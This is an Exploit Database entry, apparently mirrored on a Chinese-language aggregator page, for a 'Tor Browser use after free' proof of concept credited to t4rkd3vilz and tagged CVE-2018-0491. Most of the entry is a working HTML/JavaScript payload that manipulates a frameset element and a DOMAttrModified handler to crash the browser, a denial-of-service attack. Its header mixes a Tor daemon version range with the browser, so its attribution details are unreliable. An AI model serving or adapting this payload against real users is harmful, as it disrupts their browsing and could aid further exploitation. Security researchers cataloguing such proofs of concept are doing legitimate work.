Tor Browser < 0.3.2.10 - Use After Free (PoC)

• Exploit Database
• 15 阅读

• 作者： t4rkd3vilz
  日期： 2018-07-09
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/44994/

• # Exploit Title: Tor Browser - Use After Free (PoC)
  # Date: 09.07.2018
  # Exploit Author: t4rkd3vilz
  # Vendor Homepage: https://www.torproject.org/ 
  # Software Link: https://www.torproject.org/download/download-easy.html.en
  # Version: Tor 0.3.2.x before 0.3.2.10
  # Tested on: Kali Linux
  # CVE : CVE-2018-0491
  
  #Run exploit, result DOS
  
  
  <!DOCTYPE html>
  <html>
  <title>veryhandsome jameel naboo</title>
  <body>
  <script>
  function send()
  {
  try { document.body.contentEditable = 'true'; } catch(e){}
  try { var e0 = document.createElement("frameset"); } catch(e){}
  try { document.body.appendChild(e0); } catch(e){}
  try { e0.appendChild(document.createElement("BBBBBBBBBBBBBBB")); } catch(e){}
  try {
  e0.addEventListener("DOMAttrModified",function(){document.execCommand("SelectAll");e0['bo
  rder']='-4400000000';}, false); e0.focus();} catch(e){}
  try { e0.setAttribute('iframe'); } catch(e){}
  try { document.body.insertBefore(e0); } catch(e){}
  }
  send();</script></html>